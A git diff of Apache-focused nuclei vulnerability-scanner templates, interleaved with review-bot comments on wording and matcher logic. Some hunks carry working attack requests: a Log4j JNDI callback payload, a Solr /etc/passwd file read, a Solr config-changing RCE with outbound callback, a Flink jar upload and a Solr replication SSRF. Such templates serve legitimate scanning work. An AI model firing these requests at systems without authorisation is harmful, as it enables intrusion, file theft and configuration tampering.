"pattern":"([\\s\\S]*)", + "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965", + "columns":[ + "raw" + ] + } + }, + "dataSchema":{ + "dataSource":"sample", + "timestampSpec":{ + "column":"!!!_no_such_column_!!!", + "missingValue":"1970-01-01T00:00:00Z" + }, + "dimensionsSpec":{ + + }, + "granularitySpec":{ + "rollup":false + } + }, + "tuningConfig":{ + "type":"kafka" + } + }, + "samplerConfig":{ + "numRows":500, + "timeoutMs":15000 + } + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - 'RecordSupplier' + + - type: status + status: + - 400 +# digest: 4a0a00473045022100f788a795856513e1cd0015cba30415da3dd2e1a04d54f3ce0b6fb0f6f63e6ec9022005b2370ad3db8893c2793d0916510d1ddd938746e3cb8ef40eec403e4e3218d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-druid-log4j.yaml b/nuclei-templates/Other/apache-druid-log4j.yaml index a3878d8502..a3d3d1fa20 100644 --- a/nuclei-templates/Other/apache-druid-log4j.yaml +++ b/nuclei-templates/Other/apache-druid-log4j.yaml @@ -4,14 +4,15 @@ info: name: Apache Druid - Remote Code Execution (Apache Log4j) author: SleepingBag945 severity: critical + description: Apache Druid is vulnerable to RCE due to Log4j. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-502 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Apache Druid" tags: cve,cve2021,rce,jndi,log4j,apache,druid,oast @@ -23,7 +24,7 @@ http: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" 
@@ -35,3 +36,4 @@ http: - type: status status: - 404 +# digest: 490a00463044022030f1852a5d57ce940ce4fdb486ca500f0e80230abd9ef378a7fe2339e3a96812022023a04db5bf7848f414e848dfe20c4fc02efdb87b209cdf81956d9adad83e317b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-druid-unauth.yaml b/nuclei-templates/Other/apache-druid-unauth.yaml index 3f3b004392..d029ca9367 100644 --- a/nuclei-templates/Other/apache-druid-unauth.yaml +++ b/nuclei-templates/Other/apache-druid-unauth.yaml @@ -4,19 +4,20 @@ info: name: Apache Druid Unauth author: DhiyaneshDk severity: low + description: Apache Druid is exposed to external users. metadata: verified: true + max-request: 1 shodan-query: title:"Apache Druid" tags: misconfig,druid,unauth,apache -requests: +http: - method: GET path: - '{{BaseURL}}/unified-console.html' matchers-condition: and matchers: - - type: word words: - 'Apache Druid' @@ -24,3 +25,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022032410ebe88dff06244ecd5348b0e4a3340bcc6cbab1c26d061e3231e039f3e610221009adb943521d59e4485ab6d9a04e2117e3db0c6dae660a5ff0aa31213e9b83d97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-dubbo-detect-351.yaml b/nuclei-templates/Other/apache-dubbo-detect.yaml similarity index 100% rename from nuclei-templates/Other/apache-dubbo-detect-351.yaml rename to nuclei-templates/Other/apache-dubbo-detect.yaml diff --git a/nuclei-templates/Other/apache-dubbo-unauth.yaml b/nuclei-templates/Other/apache-dubbo-unauth.yaml index 2246661ade..bd5e4743d4 100644 --- a/nuclei-templates/Other/apache-dubbo-unauth.yaml +++ b/nuclei-templates/Other/apache-dubbo-unauth.yaml 
@@ -4,21 +4,28 @@ info: name: Apache Dubbo - Unauthenticated Access author: j4vaovo severity: high - description: Apache Dubbo Unauthenticated Access. + description: | + Apache Dubbo Unauthenticated Access were detected. reference: - tags: network,dubbo,apache,unauth + - https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/auth/ + metadata: + fofa-query: apache dubbo + max-request: 1 + verified: true + tags: network,dubbo,apache,unauth,misconfig -network: +tcp: - inputs: - data: "68656c700d0a" type: hex host: - "{{Hostname}}" - - "{{Host}}:20880" + port: 20880 read-size: 2048 matchers: - type: word words: - "trace [service] [method] [times]" +# digest: 4a0a00473045022019baed158798bd7636f8936ae6391035ee1f3cf0f6969604340953f8f06eb9530221009c8b40931f9eb4ebebf117f4b5fa3250df9ddb124d3973eb74145b11fa82e355:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-filename-enum-354.yaml b/nuclei-templates/Other/apache-filename-enum-354.yaml new file mode 100644 index 0000000000..2e57212f9c --- /dev/null +++ b/nuclei-templates/Other/apache-filename-enum-354.yaml @@ -0,0 +1,30 @@ +id: apache-filename-enum + +info: + name: Apache Filename Enumeration + author: geeknik + description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. + reference: + - https://hackerone.com/reports/210238 + - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ + severity: low + tags: apache,misconfig + +requests: + - method: GET + headers: + Accept: "fake/value" + path: + - "{{BaseURL}}/index" + + matchers-condition: and + matchers: + - type: status + status: + - 406 + - type: word + words: + - "Not Acceptable" + - "Available variants:" + - "
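Review bot: The new `description` in `apache-dubbo-unauth.yaml` reads `Apache Dubbo Unauthenticated Access were detected.`, which is ungrammatical, and it is wrapped in a `|` block scalar for a single line. Write `description: Apache Dubbo was found to accept unauthenticated access.` as a plain scalar. The protocol migration itself (`network:` → `tcp:`, `port: 20880` in place of `{{Host}}:20880`) matches what the apache-activemq-detect and apache-rocketmq-broker-unauth hunks do.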
Apache Server at" + condition: and diff --git a/nuclei-templates/Other/apache-filename-enum.yaml b/nuclei-templates/Other/apache-filename-enum.yaml deleted file mode 100644 index 5a6f43d2f1..0000000000 --- a/nuclei-templates/Other/apache-filename-enum.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: apache-filename-enum - -info: - name: Apache Filename Enumeration - author: geeknik - severity: low - description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. - reference: - - https://hackerone.com/reports/210238 - - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ - tags: apache,misconfig - -requests: - - method: GET - headers: - Accept: "fake/value" - path: - - "{{BaseURL}}/index" - - matchers-condition: and - matchers: - - type: status - status: - - 406 - - type: word - words: - - "Not Acceptable" - - "Available variants:" - - "
Apache Server at" - condition: and diff --git a/nuclei-templates/Other/apache-flink-unauth-rce-356.yaml b/nuclei-templates/Other/apache-flink-unauth-rce-356.yaml new file mode 100644 index 0000000000..30f848b7b7 --- /dev/null +++ b/nuclei-templates/Other/apache-flink-unauth-rce-356.yaml @@ -0,0 +1,44 @@ +id: apache-flink-unauth-rce +info: + name: Apache Flink - Remote Code Execution + author: pikpikcu + severity: critical + description: Apache Flink + reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: + cwe-id: CWE-77 + tags: apache,flink,rce,intrusive,unauth +requests: + - raw: + - | + POST /jars/upload HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 + + --8ce4b16b22b58894aa86c421e8759df3 + Content-Disposition: form-data; name="jarfile";filename="poc.jar" + Content-Type:application/octet-stream + + {{randstr}} + --8ce4b16b22b58894aa86c421e8759df3-- + matchers-condition: and + matchers: + - type: word + words: + - "application/json" + part: header + condition: and + - type: word + words: + - "success" + - "_poc.jar" + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/23 diff --git a/nuclei-templates/Other/apache-flink-unauth-rce-358.yaml b/nuclei-templates/Other/apache-flink-unauth-rce-358.yaml deleted file mode 100644 index 196536f66e..0000000000 --- a/nuclei-templates/Other/apache-flink-unauth-rce-358.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: apache-flink-unauth-rce -info: - name: Apache Flink Unauth RCE - author: pikpikcu - severity: critical - tags: apache,flink,rce,intrusive,unauth - reference: - - https://www.exploit-db.com/exploits/48978 - - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - - https://github.com/LandGrey/flink-unauth-rce -requests: - - raw: - - | - POST /jars/upload HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 - - --8ce4b16b22b58894aa86c421e8759df3 - Content-Disposition: form-data; name="jarfile";filename="poc.jar" - Content-Type:application/octet-stream - - {{randstr}} - --8ce4b16b22b58894aa86c421e8759df3-- - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - condition: and - - type: word - words: - - "success" - - "_poc.jar" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apache-guacamole-361.yaml b/nuclei-templates/Other/apache-guacamole.yaml similarity index 100% rename from nuclei-templates/Other/apache-guacamole-361.yaml rename to nuclei-templates/Other/apache-guacamole.yaml diff --git a/nuclei-templates/Other/default-cred-hertzbeat.yaml b/nuclei-templates/Other/apache-hertzbeat-default-login.yaml similarity index 100% rename from nuclei-templates/Other/default-cred-hertzbeat.yaml rename to nuclei-templates/Other/apache-hertzbeat-default-login.yaml diff --git a/nuclei-templates/Other/apache-httpd-rce-362.yaml b/nuclei-templates/Other/apache-httpd-rce.yaml similarity index 100% rename from nuclei-templates/Other/apache-httpd-rce-362.yaml rename to nuclei-templates/Other/apache-httpd-rce.yaml diff --git a/nuclei-templates/Other/apache-jmeter-dashboard.yaml b/nuclei-templates/Other/apache-jmeter-dashboard.yaml index c3aebac1ec..e104e72e0b 100644 --- a/nuclei-templates/Other/apache-jmeter-dashboard.yaml +++ b/nuclei-templates/Other/apache-jmeter-dashboard.yaml 
@@ -7,14 +7,17 @@ info: description: Apache JMeter Dashboard login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:apache:jmeter:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 1 + product: jmeter shodan-query: title:"Apache JMeter Dashboard" + vendor: apache + verified: true tags: apache,jmeter,panel -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -31,5 +34,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/11/28 +# digest: 4b0a00483046022100eb1037efc1fcc4364852312de1e209a9c5c8f63370a2aa20fe94a5769e4d1f1b022100bd3d0e91dac1f7227fa5ed97915b314c793c608f80806675bf6fcd2aaac8179c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-karaf-panel.yaml b/nuclei-templates/Other/apache-karaf-panel.yaml index d285acce99..367f6dd2ce 100644 --- a/nuclei-templates/Other/apache-karaf-panel.yaml +++ b/nuclei-templates/Other/apache-karaf-panel.yaml @@ -6,10 +6,11 @@ info: severity: info metadata: verified: true + max-request: 1 shodan-query: realm="karaf" tags: tech,apache,karaf -requests: +http: - method: GET path: - "{{BaseURL}}/system/console" @@ -19,3 +20,5 @@ requests: part: header words: - 'realm="karaf' + +# digest: 4a0a0047304502202851728e6494910ea649f13669b2cee5bc1aee43f144efa79b496fac38663c7a022100ad86df88ceee1fed9ec1d6133ad75c0682c93442a1471137e5f4e19d539d8eba:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/apache-licenserc.yaml b/nuclei-templates/Other/apache-licenserc.yaml index e4a3244678..27f95108a6 100644 --- a/nuclei-templates/Other/apache-licenserc.yaml +++ b/nuclei-templates/Other/apache-licenserc.yaml 
@@ -4,11 +4,13 @@ info: name: Apache License File author: DhiyaneshDk severity: low + description: Apache License file is exposed. metadata: verified: true + max-request: 1 tags: exposure,file,apache -requests: +http: - method: GET path: - '{{BaseURL}}/.licenserc.yaml' @@ -26,3 +28,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100a7b6b74566bfe96af86fd10280118edf84d552b48aacc47b665d0bd870b7491b02203d5f73ba21c11c23f632f3fc9498159f1bd6423c9f11896fcef809c03493328f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-mesos-panel.yaml b/nuclei-templates/Other/apache-mesos-panel.yaml index 4d9384da7a..b482f4fd1b 100644 --- a/nuclei-templates/Other/apache-mesos-panel.yaml +++ b/nuclei-templates/Other/apache-mesos-panel.yaml @@ -7,21 +7,25 @@ info: description: Apache Mesos panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:apache:mesos:*:*:*:*:jenkins:*:*:* metadata: - verified: true - shodan-query: http.title:"Mesos" fofa-query: app="APACHE-MESOS" + max-request: 2 + product: mesos + shodan-query: http.title:"Mesos" + vendor: apache + verified: true tags: panel,apache,mesos -requests: +http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}:5050" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -34,5 +38,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/31 +# digest: 4b0a00483046022100f9ad35c3dfc30dcfd03d982738cf7fc2177db2271595789a62aeadecfdc646b2022100bb27c79a50dd8db5a5a9423a629e2166c4757ea8e9962a89028005b0454d20b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-nifi-unauth.yaml b/nuclei-templates/Other/apache-nifi-unauth.yaml new file mode 100644 index 0000000000..97c3191b56 --- /dev/null +++ b/nuclei-templates/Other/apache-nifi-unauth.yaml 
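Review bot: `description: Apache License file is exposed.` in `apache-licenserc.yaml` is misleading for what the template requests: `/.licenserc.yaml` is the configuration file of the Apache skywalking-eyes license-header checker, not a license text, so the finding should name the file that is reachable. Suggest `description: The .licenserc.yaml license-header checker configuration is publicly accessible.`; `name: Apache License File` has the same problem.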
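Review bot: The added `matchers-condition: and` in `apache-mesos-panel.yaml` is a functional change hidden among metadata edits: without it the word and status matchers combine with the default `or`, so a 200 response carrying none of the Mesos strings used to match and now does not. That is very likely the intended tightening, but it deserves to be called out separately rather than riding along with the `cpe`, `vendor`, `product` and `max-request` additions. Removing `cvss-score: 0.0` while keeping the `cvss-metrics` vector follows the same pattern as the apache-jmeter-dashboard hunk; either keep both or drop both so the classification block stays self-consistent.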
@@ -0,0 +1,43 @@ +id: apache-nifi-unauth + +info: + name: Apache NiFi - Unauthenticated Access + author: pwnhxl + severity: high + description: | + Apache NiFi server was able to be accessed because no authentication was required. + reference: | + - https://github.com/jm0x0/apache_nifi_processor_rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-score: 8.6 + cwe-id: CWE-285 + metadata: + verified: true + max-request: 1 + shodan-query: title:"NiFi" + fofa-query: title="nifi" && body="Did you mean" + tags: misconfig,apache,nifi,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/nifi-api/access/config" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"supportsLogin":false}' + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 490a0046304402200263b216fb88659a3d69fd4b16ac40ea371468ab1eaaa10994736d75f7a0251d022048f8a0fa83b268c2949703b34a5f159f00fd208bbeed1b1ca1c9574457c3dcdb:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/apache-rocketmq-broker-unauth.yaml b/nuclei-templates/Other/apache-rocketmq-broker-unauth.yaml index 7e41f8fbc0..548ceb290d 100644 --- a/nuclei-templates/Other/apache-rocketmq-broker-unauth.yaml +++ b/nuclei-templates/Other/apache-rocketmq-broker-unauth.yaml @@ -10,7 +10,7 @@ info: - https://rocketmq.apache.org/docs/bestPractice/03access metadata: fofa-query: protocol="rocketmq" - max-request: 2 + max-request: 1 shodan-query: title:"RocketMQ" verified: true tags: network,rocketmq,broker,apache,unauth,misconfig 
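Review bot: `reference: |` in `apache-nifi-unauth.yaml` turns the reference into a literal block scalar, so its value is the string `- https://github.com/jm0x0/apache_nifi_processor_rce` with a leading dash rather than a one-element list. Drop the `|`: `reference:` followed by `  - https://github.com/jm0x0/apache_nifi_processor_rce`. The body word `'"supportsLogin":false}'` depends on the exact JSON serialization (no whitespace, the closing brace); a `regex` matcher such as `"supportsLogin"\s*:\s*false` would survive a formatting change in the API response.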
@@ -22,23 +22,22 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:10911" + port: 10911 read-size: 2048 matchers-condition: and matchers: - - type: word - words: - - serializeTypeCurrentRPC - - language - - opaque - - version - condition: and - - type: word - words: - - denied - - Bad request - - HTTP/1.1 - - 400 - condition: or - negative: true \ No newline at end of file + - type: word + words: + - serializeTypeCurrentRPC + - language + - opaque + - version + condition: and + + - type: word + words: + - "HTTP" + - "FTP" + negative: true +# digest: 490a00463044022047caf8ef37a3c31f120635dab95c1e57db0a0c80a9f44a563f77e45b5fc9d4670220123bbc8168d521dc2e99cb0d03c60f343b294c98591a3d2b88de4b415479e505:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-solr-file-read-368.yaml b/nuclei-templates/Other/apache-solr-file-read-368.yaml new file mode 100644 index 0000000000..56a6ada58d --- /dev/null +++ b/nuclei-templates/Other/apache-solr-file-read-368.yaml @@ -0,0 +1,44 @@ +id: apache-solr-file-read + +info: + name: Apache Solr <= 8.8.1 Arbitrary File Read + author: DhiyaneshDk + severity: high + tags: apache,solr,lfi + reference: + - https://twitter.com/Al1ex4/status/1382981479727128580 + - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + - https://twitter.com/sec715/status/1373472323538362371 + +requests: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + - | + GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + + extractors: + - type: regex + internal: true + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" \ No newline at end of file 
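Review bot: The rewritten negative matcher in `apache-rocketmq-broker-unauth.yaml` uses bare `words: - "HTTP" - "FTP"`; word matching is case-sensitive, so a lowercase banner would not be excluded, and the former `denied` / `Bad request` exclusions are gone. Add `case-insensitive: true` to the negative matcher, and keep `- "denied"` if the intent was still to exclude access-denied banners. The positive matcher still requires all four RocketMQ tokens with `condition: and`, so the practical false-positive window is small — but that is exactly what the negative matcher is meant to close.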
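Review bot: The second raw request in `apache-solr-file-read-368.yaml` contains a pilcrow (`¶m=ContentStream`) where a query-string separator evidently stood before the page was rendered; confirm the committed file is intact, because if that character is really in the template the second request is malformed and the template silently never matches. The `info` block has no `description`, `classification` or `metadata`, and `tags` is placed before `reference`, unlike the other templates in this diff. The `-368` suffix again does not match `id: apache-solr-file-read`.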
diff --git a/nuclei-templates/Other/apache-solr-log4j-CVE-2021-44228.yaml b/nuclei-templates/Other/apache-solr-log4j-cve-2021-44228.yaml similarity index 100% rename from nuclei-templates/Other/apache-solr-log4j-CVE-2021-44228.yaml rename to nuclei-templates/Other/apache-solr-log4j-cve-2021-44228.yaml diff --git a/nuclei-templates/Other/apache-solr-log4j-rce.yaml b/nuclei-templates/Other/apache-solr-log4j-rce.yaml index bd31144333..9a19f69c70 100644 --- a/nuclei-templates/Other/apache-solr-log4j-rce.yaml +++ b/nuclei-templates/Other/apache-solr-log4j-rce.yaml @@ -1,5 +1,4 @@ id: apache-solr-log4j-rce - info: name: Apache Solr Log4j JNDI RCE author: Evan Rubinstein,nvn1729 @@ -10,27 +9,23 @@ info: - https://twitter.com/sirifu4k1/status/1470011568834424837 - https://github.com/apache/solr/pull/454 tags: solr,oast,log4j,rce,apache,jndi - requests: - method: GET path: - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D" - matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - - type: regex part: interactsh_request regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/nuclei-templates/Other/apache-solr-rce.yaml b/nuclei-templates/Other/apache-solr-rce.yaml index f8fe789fb9..50dc1e4984 100644 --- a/nuclei-templates/Other/apache-solr-rce.yaml +++ b/nuclei-templates/Other/apache-solr-rce.yaml 
@@ -4,9 +4,12 @@ info: name: Apache Solr 9.1 - Remote Code Execution author: j4vaovo severity: critical + description: Apache Solr 9.1 is vulnerable to RCE. reference: - https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/ - tags: solr,apache,rce,oast + metadata: + max-request: 2 + tags: solr,apache,rce,oast,intrusive http: - raw: @@ -16,13 +19,10 @@ http: Content-Type: application/json { "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} - - | POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1 Host: {{Hostname}} - Accept: */* Content-Type: multipart/form-data; boundary=------------------------5897997e44b07bf9 - Connection: close --------------------------5897997e44b07bf9 Content-Disposition: form-data; name="stream.url" @@ -41,3 +41,4 @@ http: part: interactsh_request words: - "User-Agent: Java" +# digest: 4a0a00473045022100cb3600463572b923e6f4b47d3f8261b25d16d9795667a1f35875aeba097a8e1f0220576af9325702029aab5e4f16c5d99033f591da500368f8b04e416bc588e69a10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-streampipes-detect.yaml b/nuclei-templates/Other/apache-streampipes-detect.yaml index b6ac0df344..8f86267b1b 100644 --- a/nuclei-templates/Other/apache-streampipes-detect.yaml +++ b/nuclei-templates/Other/apache-streampipes-detect.yaml 
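Review bot: The added `description: Apache Solr 9.1 is vulnerable to RCE.` says nothing about what the template does, which matters here because the first raw request (its request line lies above the second hunk; the body `{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}` is visible as context) writes a setting into the target's configuration — a persistent change that is the reason for the new `intrusive` tag. Suggest something like `description: Apache Solr 9.1 - Remote Code Execution. The check enables remote streaming via the config API (a persistent configuration change on the target) and then confirms an outbound callback to the interactsh server.` The second hunk also keeps the hard-coded core path `/solr/gettingstarted_shard2_replica_n1/...`, so the check only fires on the tutorial core; that limitation is worth stating in the description as well.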
@@ -1,39 +1,39 @@ -id: apache-streampipes-detect - -info: - name: Apache StreamPipes - Detect - author: Alessandro Albani - DEVisions - severity: info - description: | - Checks for the presence of Apache StreamPipes by looking in the body or matching the favicon hash. - metadata: - max-request: 3 - verified: true - shodan-query: title:"apache streampipes" - fofa-query: title="apache streampipes" - tags: tech,apache,streampipes,detect - -http: - - method: GET - path: - - '{{BaseURL}}/streampipes-backend/api/openapi.json' - - '{{BaseURL}}/assets/img/favicon/favicon.ico' - - '{{BaseURL}}' - - host-redirects: true - max-redirects: 2 - stop-at-first-match: true - - matchers: - - type: dsl - dsl: - - contains_any(to_lower(body), "apache streampipes", "apache streampipes api") - - status_code==200 && ("1937041138" == mmh3(base64_py(body)) || "480680877" == mmh3(base64_py(body))) - condition: or - - extractors: - - type: json - part: body - group: 1 - json: - - '.info.version' +id: apache-streampipes-detect + +info: + name: Apache StreamPipes - Detect + author: Alessandro Albani - DEVisions + severity: info + description: | + Checks for the presence of Apache StreamPipes by looking in the body or matching the favicon hash. + metadata: + max-request: 3 + verified: true + shodan-query: title:"apache streampipes" + fofa-query: title="apache streampipes" + tags: tech,apache,streampipes,detect + +http: + - method: GET + path: + - '{{BaseURL}}/streampipes-backend/api/openapi.json' + - '{{BaseURL}}/assets/img/favicon/favicon.ico' + - '{{BaseURL}}' + + host-redirects: true + max-redirects: 2 + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - contains_any(to_lower(body), "apache streampipes", "apache streampipes api") + - status_code==200 && ("1937041138" == mmh3(base64_py(body)) || "480680877" == mmh3(base64_py(body))) + condition: or + + extractors: + - type: json + part: body + group: 1 + json: + - '.info.version' 
diff --git a/nuclei-templates/Other/apache-struts-showcase.yaml b/nuclei-templates/Other/apache-struts-showcase.yaml index deed9ebd88..0a240c3195 100644 --- a/nuclei-templates/Other/apache-struts-showcase.yaml +++ b/nuclei-templates/Other/apache-struts-showcase.yaml @@ -4,20 +4,23 @@ info: name: Apache Struts - ShowCase Application Exposure author: DhiyaneshDK severity: low + description: Apache Structs ShowCase Application is exposed. reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/ApacheStrutsWebConsole.java metadata: - verified: "true" + verified: true + max-request: 2 shodan-query: title:"Struts2 Showcase" tags: apache,struts,showcase,misconfig,exposure -requests: +http: - method: GET path: - '{{BaseURL}}' - '{{BaseURL}}/struts2-showcase/showcase.action' stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -28,3 +31,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100bd7f7b423bdd7d05868d8f1d47733eb40b471785b26564871538af7feb86839f022043022c33d92e6e55425a6b5e0066b736116a66816970b6d9c28d4f4731010799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-tomcat-CVE-2022-34305.yaml b/nuclei-templates/Other/apache-tomcat-cve-2022-34305.yaml similarity index 100% rename from nuclei-templates/Other/apache-tomcat-CVE-2022-34305.yaml rename to nuclei-templates/Other/apache-tomcat-cve-2022-34305.yaml diff --git a/nuclei-templates/Other/apache-tomcat-snoop-ip-disclosure.yaml b/nuclei-templates/Other/apache-tomcat-snoop-ip-disclosure.yaml index 8ffda98982..e72cd07eb1 100644 --- a/nuclei-templates/Other/apache-tomcat-snoop-ip-disclosure.yaml +++ b/nuclei-templates/Other/apache-tomcat-snoop-ip-disclosure.yaml 
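Review bot: The description added in the first hunk misspells the product name: `description: Apache Structs ShowCase Application is exposed.` should be `description: Apache Struts ShowCase Application is exposed.`, matching the `name` and `tags` on the surrounding lines. While editing it, a phrase on why the finding matters would help triage, e.g. `description: The Apache Struts ShowCase sample application is reachable; sample applications should not be deployed on production instances.`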
@@ -1,23 +1,19 @@ id: apache-tomcat-snoop-Internal-IP-disclosure - info: name: Apache Tomcat example - snoop - Internal IP disclosure author: wasp76b severity: low reference: https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks tags: apache,misconfig,tomcat,disclosure - requests: - method: GET path: - "{{BaseURL}}/examples/servlets/servlet/RequestHeaderExample" - matchers-condition: and matchers: - type: word words: - 'Request Header Example' - - type: status status: - 200 diff --git a/nuclei-templates/Other/apachesolrlfissrf.yaml b/nuclei-templates/Other/apachesolrlfissrf.yaml new file mode 100644 index 0000000000..7d28fe62e8 --- /dev/null +++ b/nuclei-templates/Other/apachesolrlfissrf.yaml 
@@ -0,0 +1,47 @@ +id: CVE-2021-27905 + +info: + name: Apache Solr <= 8.8.1 SSRF + author: hackergautam + severity: critical + tags: cve,cve2021,apache,solr,ssrf + description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2. + reference: + - https://www.anquanke.com/post/id/238201 + - https://ubuntu.com/security/CVE-2021-27905 + - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 + - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-27905 + cwe-id: CWE-918 + +requests: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + - | + GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + + extractors: + - type: regex + internal: true + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + + matchers: + - type: word + words: + - '<str name="status">OK</str>' + part: body \ No newline at end of file diff --git a/nuclei-templates/Other/apc-info-379.yaml b/nuclei-templates/Other/apc-info-379.yaml deleted file mode 100644 index 0fc35742be..0000000000 --- a/nuclei-templates/Other/apc-info-379.yaml +++ /dev/null 
